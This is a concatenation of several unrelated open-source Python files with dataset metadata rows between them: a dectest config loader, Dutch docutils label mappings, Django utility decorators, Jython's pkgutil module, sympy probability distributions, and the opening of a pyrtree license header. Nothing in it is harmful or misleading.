def get_bool(self, section_name, item_name):
"""
Converts the config value into a boolean. If the value is a string, then
a number of values will be checked. The mappings are:
+-------+------+
| str | bool |
+=======+======+
|'yes' | |
+-------+ |
|'true' | True |
+-------+ |
|'y' | |
+-------+------+
|'no' | |
+-------+ |
|'false'| False|
+-------+ |
|'n' | |
+-------+------+
These values are not case sensitive. If the value is not a string or a
boolean, then `None` will be returned.
"""
value = self.get(section_name, item_name)
if isinstance(value, (str, unicode)):
bool_mapping = {
'yes': True,
'true': True,
'y': True,
'no': False,
'false': False,
'n': False,
}
if value.lower() in bool_mapping:
return bool_mapping[value.lower()]
elif isinstance(value, bool):
return value
else:
return None
def get_default(self, section_name, item_name):
"""
Returns the default value.
"""
return DEFAULTS[section_name][item_name]
def get_list(self, section_name, item_name):
"""
Returns the config value at the given section as a list.
If the value is not a string, then it will be converted into a list by
calling `list(value)`. If the value is a string, it will be treated as a
CSV, and split then returned.
If the value converted to a list is empty, or the value could not be
converted, then `None` will be returned.
"""
value = self.get(section_name, item_name)
if isinstance(value, (str, unicode)):
return value.split(",") or None
else:
try:
return list(value) or None
except TypeError:
return None
def get_python(self, name):
"""
Tries to return the object at the given name. If the object cannot be
found, then `None` is returned.
The name of an object is it's module name and then the identifier that
you would have to type to access the object. For example, in the module
`dectest.suite`, there is the class `TestSuite`. The name for that item
would be `dectest.suite.TestSuite`.
If the `name` argument is not a `str` or `unicode`, then it will just be
returned.
"""
if not isinstance(name, (str, unicode)):
return name
path = name.split(".")
if len(path) < 2:
self._logger.warning("Invalid python path: " + name)
return
module_path = path[:-1]
attribute_path = [path[-1]]
module = self._import_module('.'.join(module_path))
while not module:
if not path:
raise Warning("Could not find module for python path " +
name)
return
attribute_path.insert(0, module_path.pop())
module = self._import_module('.'.join(module_path))
current = module
for attribute in attribute_path:
current = getattr(current, attribute)
if not current:
self._logger.warning("Could not find attribute for python" +
" path " + name)
return
return current
def set_logger(self, logger):
"""
Sets the logger that the config class can use to report any errors or
warnings in ``get_foo`` methods.
"""
self._logger = logger
def _import_module(self, name):
"""
Imports an arbitrarily named module, and returns the module object if
the import succeeds, otherwise returns `None`.
"""
try:
module = __import__(name, fromlist=name.split(".")[:-1])
except ImportError:
return
else:
return module
def __getattr__(self, section_name):
"""
Allow us to do `config.section.item` instead of
`config.get("section", "item")`
"""
if re.match("__(\w*)__", section_name):
raise AttributeError()
class Section():
"""
Just a little class to wrap a ConfigInterface.get call.
"""
def __getattr__(_, item_name):
"""
Return the actual value.
"""
return self.get(section_name, item_name)
return Section()
class DefaultConfig(ConfigInterface):
"""
A config class that only provides the default values for every setting. Use
this when no config file is provided.
"""
store = DEFAULTS
class PythonFileConfig(ConfigInterface):
"""
A config class that loads the dictionary from the global namespace of any
given python file.
The file should define a class for each section, with attributes for each
value. The class names and attribute names are not case sensitive
For example::
# dectest_config.py
class section1:
item1 = 0
item2 = "one"
item3 = True
class section2:
foo = "bar"
"""
def __init__(self, filename):
"""
Set the filename, and load it.
"""
self.filename = filename
# We set this as if the reload method fails, store may be unbound
self.store = {}
self.reload()
def reload(self):
"""
Reloads the configuration file, and populates the store attribute.
"""
try:
module = imp.load_source('config', self.filename)
except Exception as e:
self.store = DEFAULTS
self._logger.warning("Could not load configuration file " +
self.filename + ", raised exception " +
str(e))
return
self.store = {}
for s_name, s_value in module.__dict__.items():
if s_name.startswith("_") or not type(s_value) == type:
continue
self.store[s_name] = {}
for i_name, i_value in s_value.__dict__.items():
self.store[s_name][i_name] = i_value
class DictConfig(ConfigInterface):
"""
Provides a simple way of configuring dectest via a dictionary.
Takes a dictionary as it's only argument.
"""
def __init__(self, dictionary):
self.store = dictionary
| lgpl-3.0 | 6,663,564,968,980,631,000 | 30.897106 | 80 | 0.520766 | false |
garinh/cs | docs/support/docutils/languages/nl.py | 1 | 1918 | # Author: Martijn Pieters
# Contact: [email protected]
# Revision: $Revision: 21817 $
# Date: $Date: 2005-07-21 13:39:57 -0700 (Thu, 21 Jul 2005) $
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Dutch-language mappings for language-dependent features of Docutils.
"""
__docformat__ = 'reStructuredText'
labels = {
# fixed: language-dependent
'author': 'Auteur',
'authors': 'Auteurs',
'organization': 'Organisatie',
'address': 'Adres',
'contact': 'Contact',
'version': 'Versie',
'revision': 'Revisie',
'status': 'Status',
'date': 'Datum',
'copyright': 'Copyright',
'dedication': 'Toewijding',
'abstract': 'Samenvatting',
'attention': 'Attentie!',
'caution': 'Let op!',
'danger': '!GEVAAR!',
'error': 'Fout',
'hint': 'Hint',
'important': 'Belangrijk',
'note': 'Opmerking',
'tip': 'Tip',
'warning': 'Waarschuwing',
'contents': 'Inhoud'}
"""Mapping of node class name to label text."""
bibliographic_fields = {
# language-dependent: fixed
'auteur': 'author',
'auteurs': 'authors',
'organisatie': 'organization',
'adres': 'address',
'contact': 'contact',
'versie': 'version',
'revisie': 'revision',
'status': 'status',
'datum': 'date',
'copyright': 'copyright',
'toewijding': 'dedication',
'samenvatting': 'abstract'}
"""Dutch (lowcased) to canonical name mapping for bibliographic fields."""
author_separators = [';', ',']
"""List of separator strings for the 'Authors' bibliographic field. Tried in
order."""
| lgpl-2.1 | -12,215,509,055,997,698 | 29.935484 | 76 | 0.61366 | false |
karthikrish/django-utils | djutils/decorators.py | 1 | 3986 | import atexit
import Queue
import re
import time
import threading
from django.conf import settings
from django.core.cache import cache
from django.http import HttpResponseForbidden, HttpResponseRedirect
from django.utils.functional import wraps
from djutils.cache import key_from_args
class EmptyObject(object):
pass
def cached_for_model(cache_timeout=300):
"""
Model method decorator that caches the return value for the given time.
Usage::
class MyModel(models.Model):
...
@cached_for_model(60)
def get_expensive_data(self, some_arg):
# do expensive calculations here
return data
"""
def decorator(func):
def cache_key_for_function(instance, *args, **kwargs):
klass = type(instance)._meta.module_name
hashed = key_from_args((args, kwargs))
return 'djutils.%s.cached.%s.%s.%s.%s' % (
settings.SITE_ID, klass, func.__name__, instance.pk, hashed
)
@wraps(func)
def inner(self, *args, **kwargs):
key = cache_key_for_function(self, *args, **kwargs)
result = cache.get(key, EmptyObject)
if result is EmptyObject or settings.DEBUG:
result = func(self, *args, **kwargs)
cache.set(key, result, cache_timeout)
return result
return inner
return decorator
def throttle(methods_or_func, limit=3, duration=900):
"""
Throttle the given function, returning 403s if limit exceeded
Example::
# limit to 5 POST or PUT requests per 5 minutes:
@throttle(['POST', 'PUT'], 5, 300)
def my_view(request, ...):
# do some stuff
# limit to 3 POST requests per 15 minutes:
@throttle
def my_other_view(request, ...):
# ..self.
"""
if callable(methods_or_func):
methods = ('POST',)
else:
methods = methods_or_func
def decorator(func):
@wraps(func)
def inner(request, *args, **kwargs):
if request.method in methods:
remote_addr = request.META.get('HTTP_X_FORWARDED_FOR') or \
request.META.get('REMOTE_ADDR')
if remote_addr:
key = re.sub(r'[^0-9\.]', '', remote_addr)
cached = cache.get(key)
if cached == limit:
return HttpResponseForbidden('Try slowing down a little.')
elif not cached:
cache.set(key, 1, duration)
else:
cache.incr(key)
return func(request, *args, **kwargs)
return inner
if callable(methods_or_func):
return decorator(methods_or_func)
return decorator
def memoize(func):
func._memoize_cache = {}
@wraps(func)
def inner(*args, **kwargs):
key = (args, tuple(kwargs.items()))
if key not in func._memoize_cache:
func._memoize_cache[key] = func(*args, **kwargs)
return func._memoize_cache[key]
return inner
def worker_thread():
while 1:
func, args, kwargs = queue.get()
try:
func(*args, **kwargs)
except:
pass # <-- log error here
finally:
queue.task_done()
def async(func):
"""
Execute the function asynchronously in a separate thread
"""
@wraps(func)
def inner(*args, **kwargs):
queue.put((func, args, kwargs))
return inner
queue = Queue.Queue()
for i in range(getattr(settings, 'DJANGO_UTILS_WORKER_THREADS', 1)):
thread = threading.Thread(target=worker_thread)
thread.daemon = True
thread.start()
def cleanup():
queue.join()
atexit.register(cleanup)
| mit | 6,624,859,138,889,896,000 | 26.874126 | 82 | 0.540642 | false |
babble/babble | include/jython/Lib/pkgutil.py | 1 | 18826 | """Utilities to support packages."""
# NOTE: This module must remain compatible with Python 2.3, as it is shared
# by setuptools for distribution with Python 2.3 and up.
import os
import sys
import imp
import os.path
from types import ModuleType
from org.python.core import imp as _imp, BytecodeLoader
__all__ = [
'get_importer', 'iter_importers', 'get_loader', 'find_loader',
'walk_packages', 'iter_modules',
'ImpImporter', 'ImpLoader', 'read_code', 'extend_path',
]
# equivalent to CPythonLib's pkgutil.read_code except that we need
# diff args to pass into our underlying imp implementation, as
# accessed by _imp here
def read_jython_code(fullname, file, filename):
data = _imp.readCode(filename, file, False)
return BytecodeLoader.makeCode(fullname + "$py", data, filename)
def simplegeneric(func):
"""Make a trivial single-dispatch generic function"""
registry = {}
def wrapper(*args, **kw):
ob = args[0]
try:
cls = ob.__class__
except AttributeError:
cls = type(ob)
try:
mro = cls.__mro__
except AttributeError:
try:
class cls(cls, object):
pass
mro = cls.__mro__[1:]
except TypeError:
mro = object, # must be an ExtensionClass or some such :(
for t in mro:
if t in registry:
return registry[t](*args, **kw)
else:
return func(*args, **kw)
try:
wrapper.__name__ = func.__name__
except (TypeError, AttributeError):
pass # Python 2.3 doesn't allow functions to be renamed
def register(typ, func=None):
if func is None:
return lambda f: register(typ, f)
registry[typ] = func
return func
wrapper.__dict__ = func.__dict__
wrapper.__doc__ = func.__doc__
wrapper.register = register
return wrapper
def walk_packages(path=None, prefix='', onerror=None):
"""Yields (module_loader, name, ispkg) for all modules recursively
on path, or, if path is None, all accessible modules.
'path' should be either None or a list of paths to look for
modules in.
'prefix' is a string to output on the front of every module name
on output.
Note that this function must import all *packages* (NOT all
modules!) on the given path, in order to access the __path__
attribute to find submodules.
'onerror' is a function which gets called with one argument (the
name of the package which was being imported) if any exception
occurs while trying to import a package. If no onerror function is
supplied, ImportErrors are caught and ignored, while all other
exceptions are propagated, terminating the search.
Examples:
# list all modules python can access
walk_packages()
# list all submodules of ctypes
walk_packages(ctypes.__path__, ctypes.__name__+'.')
"""
def seen(p, m={}):
if p in m:
return True
m[p] = True
for importer, name, ispkg in iter_modules(path, prefix):
yield importer, name, ispkg
if ispkg:
try:
__import__(name)
except ImportError:
if onerror is not None:
onerror(name)
except Exception:
if onerror is not None:
onerror(name)
else:
raise
else:
path = getattr(sys.modules[name], '__path__', None) or []
# don't traverse path items we've seen before
path = [p for p in path if not seen(p)]
for item in walk_packages(path, name+'.', onerror):
yield item
def iter_modules(path=None, prefix=''):
"""Yields (module_loader, name, ispkg) for all submodules on path,
or, if path is None, all top-level modules on sys.path.
'path' should be either None or a list of paths to look for
modules in.
'prefix' is a string to output on the front of every module name
on output.
"""
if path is None:
importers = iter_importers()
else:
importers = map(get_importer, path)
yielded = {}
for i in importers:
for name, ispkg in iter_importer_modules(i, prefix):
if name not in yielded:
yielded[name] = 1
yield i, name, ispkg
#@simplegeneric
def iter_importer_modules(importer, prefix=''):
if not hasattr(importer, 'iter_modules'):
return []
return importer.iter_modules(prefix)
iter_importer_modules = simplegeneric(iter_importer_modules)
class ImpImporter:
"""PEP 302 Importer that wraps Python's "classic" import algorithm
ImpImporter(dirname) produces a PEP 302 importer that searches that
directory. ImpImporter(None) produces a PEP 302 importer that searches
the current sys.path, plus any modules that are frozen or built-in.
Note that ImpImporter does not currently support being used by placement
on sys.meta_path.
"""
def __init__(self, path=None):
self.path = path
def find_module(self, fullname, path=None):
# Note: we ignore 'path' argument since it is only used via meta_path
subname = fullname.split(".")[-1]
if subname != fullname and self.path is None:
return None
if self.path is None:
path = None
else:
path = [os.path.realpath(self.path)]
try:
file, filename, etc = imp.find_module(subname, path)
except ImportError:
return None
return ImpLoader(fullname, file, filename, etc)
def iter_modules(self, prefix=''):
if self.path is None or not os.path.isdir(self.path):
return
yielded = {}
import inspect
filenames = os.listdir(self.path)
filenames.sort() # handle packages before same-named modules
for fn in filenames:
modname = inspect.getmodulename(fn)
if modname=='__init__' or modname in yielded:
continue
path = os.path.join(self.path, fn)
ispkg = False
if not modname and os.path.isdir(path) and '.' not in fn:
modname = fn
for fn in os.listdir(path):
subname = inspect.getmodulename(fn)
if subname=='__init__':
ispkg = True
break
else:
continue # not a package
if modname and '.' not in modname:
yielded[modname] = 1
yield prefix + modname, ispkg
class ImpLoader:
"""PEP 302 Loader that wraps Python's "classic" import algorithm
"""
code = source = None
def __init__(self, fullname, file, filename, etc):
self.file = file
self.filename = filename
self.fullname = fullname
self.etc = etc
def load_module(self, fullname):
self._reopen()
try:
mod = imp.load_module(fullname, self.file, self.filename, self.etc)
finally:
if self.file:
self.file.close()
# Note: we don't set __loader__ because we want the module to look
# normal; i.e. this is just a wrapper for standard import machinery
return mod
def get_data(self, pathname):
return open(pathname, "rb").read()
def _reopen(self):
if self.file and self.file.closed:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
self.file = open(self.filename, 'rU')
elif mod_type in (imp.PY_COMPILED, imp.C_EXTENSION):
self.file = open(self.filename, 'rb')
def _fix_name(self, fullname):
if fullname is None:
fullname = self.fullname
elif fullname != self.fullname:
raise ImportError("Loader for module %s cannot handle "
"module %s" % (self.fullname, fullname))
return fullname
def is_package(self, fullname):
fullname = self._fix_name(fullname)
return self.etc[2]==imp.PKG_DIRECTORY
def get_code(self, fullname=None):
fullname = self._fix_name(fullname)
if self.code is None:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
source = self.get_source(fullname)
self.code = compile(source, self.filename, 'exec')
elif mod_type==imp.PY_COMPILED:
self._reopen()
try:
self.code = read_jython_code(fullname, self.file, self.filename)
finally:
self.file.close()
elif mod_type==imp.PKG_DIRECTORY:
self.code = self._get_delegate().get_code()
return self.code
def get_source(self, fullname=None):
fullname = self._fix_name(fullname)
if self.source is None:
mod_type = self.etc[2]
if mod_type==imp.PY_SOURCE:
self._reopen()
try:
self.source = self.file.read()
finally:
self.file.close()
elif mod_type==imp.PY_COMPILED:
if os.path.exists(self.filename[:-1]):
f = open(self.filename[:-1], 'rU')
self.source = f.read()
f.close()
elif mod_type==imp.PKG_DIRECTORY:
self.source = self._get_delegate().get_source()
return self.source
def _get_delegate(self):
return ImpImporter(self.filename).find_module('__init__')
def get_filename(self, fullname=None):
fullname = self._fix_name(fullname)
mod_type = self.etc[2]
if self.etc[2]==imp.PKG_DIRECTORY:
return self._get_delegate().get_filename()
elif self.etc[2] in (imp.PY_SOURCE, imp.PY_COMPILED, imp.C_EXTENSION):
return self.filename
return None
try:
import zipimport
from zipimport import zipimporter
def iter_zipimport_modules(importer, prefix=''):
dirlist = zipimport._zip_directory_cache[importer.archive].keys()
dirlist.sort()
_prefix = importer.prefix
plen = len(_prefix)
yielded = {}
import inspect
for fn in dirlist:
if not fn.startswith(_prefix):
continue
fn = fn[plen:].split(os.sep)
if len(fn)==2 and fn[1].startswith('__init__.py'):
if fn[0] not in yielded:
yielded[fn[0]] = 1
yield fn[0], True
if len(fn)!=1:
continue
modname = inspect.getmodulename(fn[0])
if modname=='__init__':
continue
if modname and '.' not in modname and modname not in yielded:
yielded[modname] = 1
yield prefix + modname, False
iter_importer_modules.register(zipimporter, iter_zipimport_modules)
except ImportError:
pass
def get_importer(path_item):
"""Retrieve a PEP 302 importer for the given path item
The returned importer is cached in sys.path_importer_cache
if it was newly created by a path hook.
If there is no importer, a wrapper around the basic import
machinery is returned. This wrapper is never inserted into
the importer cache (None is inserted instead).
The cache (or part of it) can be cleared manually if a
rescan of sys.path_hooks is necessary.
"""
try:
importer = sys.path_importer_cache[path_item]
except KeyError:
for path_hook in sys.path_hooks:
try:
importer = path_hook(path_item)
break
except ImportError:
pass
else:
importer = None
sys.path_importer_cache.setdefault(path_item, importer)
if importer is None:
try:
importer = ImpImporter(path_item)
except ImportError:
importer = None
return importer
def iter_importers(fullname=""):
"""Yield PEP 302 importers for the given module name
If fullname contains a '.', the importers will be for the package
containing fullname, otherwise they will be importers for sys.meta_path,
sys.path, and Python's "classic" import machinery, in that order. If
the named module is in a package, that package is imported as a side
effect of invoking this function.
Non PEP 302 mechanisms (e.g. the Windows registry) used by the
standard import machinery to find files in alternative locations
are partially supported, but are searched AFTER sys.path. Normally,
these locations are searched BEFORE sys.path, preventing sys.path
entries from shadowing them.
For this to cause a visible difference in behaviour, there must
be a module or package name that is accessible via both sys.path
and one of the non PEP 302 file system mechanisms. In this case,
the emulation will find the former version, while the builtin
import mechanism will find the latter.
Items of the following types can be affected by this discrepancy:
imp.C_EXTENSION, imp.PY_SOURCE, imp.PY_COMPILED, imp.PKG_DIRECTORY
"""
if fullname.startswith('.'):
raise ImportError("Relative module names not supported")
if '.' in fullname:
# Get the containing package's __path__
pkg = '.'.join(fullname.split('.')[:-1])
if pkg not in sys.modules:
__import__(pkg)
path = getattr(sys.modules[pkg], '__path__', None) or []
else:
for importer in sys.meta_path:
yield importer
path = sys.path
for item in path:
yield get_importer(item)
if '.' not in fullname:
yield ImpImporter()
def get_loader(module_or_name):
"""Get a PEP 302 "loader" object for module_or_name
If the module or package is accessible via the normal import
mechanism, a wrapper around the relevant part of that machinery
is returned. Returns None if the module cannot be found or imported.
If the named module is not already imported, its containing package
(if any) is imported, in order to establish the package __path__.
This function uses iter_importers(), and is thus subject to the same
limitations regarding platform-specific special import locations such
as the Windows registry.
"""
if module_or_name in sys.modules:
module_or_name = sys.modules[module_or_name]
if isinstance(module_or_name, ModuleType):
module = module_or_name
loader = getattr(module, '__loader__', None)
if loader is not None:
return loader
fullname = module.__name__
elif module_or_name == sys:
# Jython sys is not a real module; fake it here for now since
# making it a module requires a fair amount of decoupling from
# PySystemState
fullname = "sys"
else:
fullname = module_or_name
return find_loader(fullname)
def find_loader(fullname):
"""Find a PEP 302 "loader" object for fullname
If fullname contains dots, path must be the containing package's __path__.
Returns None if the module cannot be found or imported. This function uses
iter_importers(), and is thus subject to the same limitations regarding
platform-specific special import locations such as the Windows registry.
"""
for importer in iter_importers(fullname):
loader = importer.find_module(fullname)
if loader is not None:
return loader
return None
def extend_path(path, name):
"""Extend a package's path.
Intended use is to place the following code in a package's __init__.py:
from pkgutil import extend_path
__path__ = extend_path(__path__, __name__)
This will add to the package's __path__ all subdirectories of
directories on sys.path named after the package. This is useful
if one wants to distribute different parts of a single logical
package as multiple directories.
It also looks for *.pkg files beginning where * matches the name
argument. This feature is similar to *.pth files (see site.py),
except that it doesn't special-case lines starting with 'import'.
A *.pkg file is trusted at face value: apart from checking for
duplicates, all entries found in a *.pkg file are added to the
path, regardless of whether they are exist the filesystem. (This
is a feature.)
If the input path is not a list (as is the case for frozen
packages) it is returned unchanged. The input path is not
modified; an extended copy is returned. Items are only appended
to the copy at the end.
It is assumed that sys.path is a sequence. Items of sys.path that
are not (unicode or 8-bit) strings referring to existing
directories are ignored. Unicode items of sys.path that cause
errors when used as filenames may cause this function to raise an
exception (in line with os.path.isdir() behavior).
"""
if not isinstance(path, list):
# This could happen e.g. when this is called from inside a
# frozen package. Return the path unchanged in that case.
return path
pname = os.path.join(*name.split('.')) # Reconstitute as relative path
# Just in case os.extsep != '.'
sname = os.extsep.join(name.split('.'))
sname_pkg = sname + os.extsep + "pkg"
init_py = "__init__" + os.extsep + "py"
path = path[:] # Start with a copy of the existing path
for dir in sys.path:
if not isinstance(dir, basestring) or not os.path.isdir(dir):
continue
subdir = os.path.join(dir, pname)
# XXX This may still add duplicate entries to path on
# case-insensitive filesystems
initfile = os.path.join(subdir, init_py)
if subdir not in path and os.path.isfile(initfile):
path.append(subdir)
# XXX Is this the right thing for subpackages like zope.app?
# It looks for a file named "zope.app.pkg"
pkgfile = os.path.join(dir, sname_pkg)
if os.path.isfile(pkgfile):
try:
f = open(pkgfile)
except IOError, msg:
sys.stderr.write("Can't open %s: %s\n" %
(pkgfile, msg))
else:
for line in f:
line = line.rstrip('\n')
if not line or line.startswith('#'):
continue
path.append(line) # Don't check for existence!
f.close()
return path
| apache-2.0 | 1,416,052,986,150,676,500 | 33.354015 | 84 | 0.597472 | false |
Cuuuurzel/KiPyCalc | sympy_old/statistics/distributions.py | 2 | 11156 | from sympy.core import sympify, Lambda, Dummy, Integer, Rational, oo, Float, pi
from sympy.functions import sqrt, exp, erf
from sympy.printing import sstr
import random
class Sample(tuple):
"""
Sample([x1, x2, x3, ...]) represents a collection of samples.
Sample parameters like mean, variance and stddev can be accessed as
properties.
The sample will be sorted.
"""
def __new__(cls, sample):
s = tuple.__new__(cls, sorted(sample))
s.mean = mean = sum(s) / Integer(len(s))
s.variance = sum([(x-mean)**2 for x in s]) / Integer(len(s))
s.stddev = sqrt(s.variance)
if len(s) % 2:
s.median = s[len(s)//2]
else:
s.median = sum(s[len(s)//2-1:len(s)//2+1]) / Integer(2)
return s
def __repr__(self):
return sstr(self)
def __str__(self):
return sstr(self)
class ContinuousProbability(object):
"""Base class for continuous probability distributions"""
def probability(s, a, b):
"""Calculate the probability that a random number x generated
from the distribution satisfies a <= x <= b """
return s.cdf(b) - s.cdf(a)
def random(s, n=None):
"""
random() -- generate a random number from the distribution.
random(n) -- generate a Sample of n random numbers.
"""
if n is None:
return s._random()
else:
return Sample([s._random() for i in xrange(n)])
def __repr__(self):
return sstr(self)
def __str__(self):
return sstr(self)
class Normal(ContinuousProbability):
"""
Normal(mu, sigma) represents the normal or Gaussian distribution
with mean value mu and standard deviation sigma.
Example usage:
>>> from sympy.statistics import Normal
>>> from sympy import oo
>>> N = Normal(1, 2)
>>> N.mean
1
>>> N.variance
4
>>> N.probability(-oo, 1) # probability on an interval
1/2
>>> N.probability(1, oo)
1/2
>>> N.probability(-oo, oo)
1
>>> N.probability(-1, 3)
erf(sqrt(2)/2)
>>> _.evalf()
0.682689492137086
"""
def __init__(self, mu, sigma):
self.mu = sympify(mu)
self.sigma = sympify(sigma)
mean = property(lambda s: s.mu)
median = property(lambda s: s.mu)
mode = property(lambda s: s.mu)
stddev = property(lambda s: s.sigma)
variance = property(lambda s: s.sigma**2)
def pdf(s, x):
"""Return the probability density function as an expression in x"""
x = sympify(x)
return 1/(s.sigma*sqrt(2*pi)) * exp(-(x-s.mu)**2 / (2*s.sigma**2))
def cdf(s, x):
"""Return the cumulative density function as an expression in x"""
x = sympify(x)
return (1+erf((x-s.mu)/(s.sigma*sqrt(2))))/2
def _random(s):
return random.gauss(float(s.mu), float(s.sigma))
def confidence(s, p):
"""Return a symmetric (p*100)% confidence interval. For example,
p=0.95 gives a 95% confidence interval. Currently this function
only handles numerical values except in the trivial case p=1.
Examples usage:
# One standard deviation
>>> from sympy.statistics import Normal
>>> N = Normal(0, 1)
>>> N.confidence(0.68)
(-0.994457883209753, 0.994457883209753)
>>> N.probability(*_).evalf()
0.680000000000000
# Two standard deviations
>>> N = Normal(0, 1)
>>> N.confidence(0.95)
(-1.95996398454005, 1.95996398454005)
>>> N.probability(*_).evalf()
0.950000000000000
"""
if p == 1:
return (-oo, oo)
assert p <= 1
# In terms of n*sigma, we have n = sqrt(2)*ierf(p). The inverse
# error function is not yet implemented in SymPy but can easily be
# computed numerically
from sympy.mpmath import mpf, erfinv
# calculate y = ierf(p) by solving erf(y) - p = 0
y = erfinv(mpf(p))
t = Float(str(mpf(float(s.sigma)) * mpf(2)**0.5 * y))
mu = s.mu.evalf()
return (mu-t, mu+t)
@staticmethod
def fit(sample):
"""Create a normal distribution fit to the mean and standard
deviation of the given distribution or sample."""
if not hasattr(sample, "stddev"):
sample = Sample(sample)
return Normal(sample.mean, sample.stddev)
class Uniform(ContinuousProbability):
"""
Uniform(a, b) represents a probability distribution with uniform
probability density on the interval [a, b] and zero density
everywhere else.
"""
def __init__(self, a, b):
self.a = sympify(a)
self.b = sympify(b)
mean = property(lambda s: (s.a+s.b)/2)
median = property(lambda s: (s.a+s.b)/2)
mode = property(lambda s: (s.a+s.b)/2) # arbitrary
variance = property(lambda s: (s.b-s.a)**2 / 12)
stddev = property(lambda s: sqrt(s.variance))
def pdf(s, x):
"""Return the probability density function as an expression in x"""
x = sympify(x)
if not x.is_Number:
raise NotImplementedError("SymPy does not yet support"
"piecewise functions")
if x < s.a or x > s.b:
return Rational(0)
return 1/(s.b-s.a)
def cdf(s, x):
"""Return the cumulative density function as an expression in x"""
x = sympify(x)
if not x.is_Number:
raise NotImplementedError("SymPy does not yet support"
"piecewise functions")
if x <= s.a:
return Rational(0)
if x >= s.b:
return Rational(1)
return (x-s.a)/(s.b-s.a)
def _random(s):
return Float(random.uniform(float(s.a), float(s.b)))
def confidence(s, p):
"""Generate a symmetric (p*100)% confidence interval.
>>> from sympy import Rational
>>> from sympy.statistics import Uniform
>>> U = Uniform(1, 2)
>>> U.confidence(1)
(1, 2)
>>> U.confidence(Rational(1,2))
(5/4, 7/4)
"""
p = sympify(p)
assert p <= 1
d = (s.b-s.a)*p / 2
return (s.mean - d, s.mean + d)
@staticmethod
def fit(sample):
"""Create a uniform distribution fit to the mean and standard
deviation of the given distribution or sample."""
if not hasattr(sample, "stddev"):
sample = Sample(sample)
m = sample.mean
d = sqrt(12*sample.variance)/2
return Uniform(m-d, m+d)
class PDF(ContinuousProbability):
"""
PDF(func, (x, a, b)) represents continuous probability distribution
with probability distribution function func(x) on interval (a, b)
If func is not normalized so that integrate(func, (x, a, b)) == 1,
it can be normalized using PDF.normalize() method
Example usage:
>>> from sympy import Symbol, exp, oo
>>> from sympy.statistics.distributions import PDF
>>> from sympy.abc import x
>>> a = Symbol('a', positive=True)
>>> exponential = PDF(exp(-x/a)/a, (x,0,oo))
>>> exponential.pdf(x)
exp(-x/a)/a
>>> exponential.cdf(x)
1 - exp(-x/a)
>>> exponential.mean
a
>>> exponential.variance
a**2
"""
def __init__(self, pdf, var):
#XXX maybe add some checking of parameters
if isinstance(var, (tuple, list)):
self.pdf = Lambda(var[0], pdf)
self.domain = tuple(var[1:])
else:
self.pdf = Lambda(var, pdf)
self.domain = (-oo, oo)
self._cdf = None
self._mean = None
self._variance = None
self._stddev = None
def normalize(self):
"""
Normalize the probability distribution function so that
integrate(self.pdf(x), (x, a, b)) == 1
Example usage:
>>> from sympy import Symbol, exp, oo
>>> from sympy.statistics.distributions import PDF
>>> from sympy.abc import x
>>> a = Symbol('a', positive=True)
>>> exponential = PDF(exp(-x/a), (x,0,oo))
>>> exponential.normalize().pdf(x)
exp(-x/a)/a
"""
norm = self.probability(*self.domain)
if norm != 1:
w = Dummy('w', real=True)
return self.__class__(self.pdf(w)/norm, (w, self.domain[0], self.domain[1]))
#self._cdf = Lambda(w, (self.cdf(w) - self.cdf(self.domain[0]))/norm)
#if self._mean is not None:
# self._mean /= norm
#if self._variance is not None:
# self._variance = (self._variance + (self._mean*norm)**2)/norm - self.mean**2
#if self._stddev is not None:
# self._stddev = sqrt(self._variance)
else:
return self
def cdf(self, x):
x = sympify(x)
if self._cdf is not None:
return self._cdf(x)
else:
from sympy import integrate
w = Dummy('w', real=True)
self._cdf = integrate(self.pdf(w), w)
self._cdf = Lambda(w, self._cdf - self._cdf.subs(w, self.domain[0]))
return self._cdf(x)
def _get_mean(self):
if self._mean is not None:
return self._mean
else:
from sympy import integrate
w = Dummy('w', real=True)
self._mean = integrate(self.pdf(w)*w,(w,self.domain[0],self.domain[1]))
return self._mean
def _get_variance(self):
if self._variance is not None:
return self._variance
else:
from sympy import integrate, simplify
w = Dummy('w', real=True)
self._variance = integrate(self.pdf(w)*w**2,(w,self.domain[0],self.domain[1])) - self.mean**2
self._variance = simplify(self._variance)
return self._variance
def _get_stddev(self):
if self._stddev is not None:
return self._stddev
else:
self._stddev = sqrt(self.variance)
return self._stddev
mean = property(_get_mean)
variance = property(_get_variance)
stddev = property(_get_stddev)
def _random(s):
raise NotImplementedError
def transform(self,func,var):
"""Return a probability distribution of random variable func(x)
currently only some simple injective functions are supported"""
w = Dummy('w', real=True)
from sympy import solve
inverse = solve(func-w, var)
newPdf = S.Zero
funcdiff = func.diff(var)
#TODO check if x is in domain
for x in inverse:
# this assignment holds only for x in domain
# in general it would require implementing
# piecewise defined functions in sympy
newPdf += (self.pdf(var)/abs(funcdiff)).subs(var,x)
return PDF(newPdf, (w, func.subs(var, self.domain[0]), func.subs(var, self.domain[1])))
| mit | -1,953,693,750,331,349,500 | 29.903047 | 105 | 0.547598 | false |
DigitalSlideArchive/HistomicsTK | histomicstk/annotations_and_masks/pyrtree/rect.py | 1 | 5357 | """
# Modified from: https://code.google.com/archive/p/pyrtree/ .
# Copyright Google
# Under The 3-Clause BSD License
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
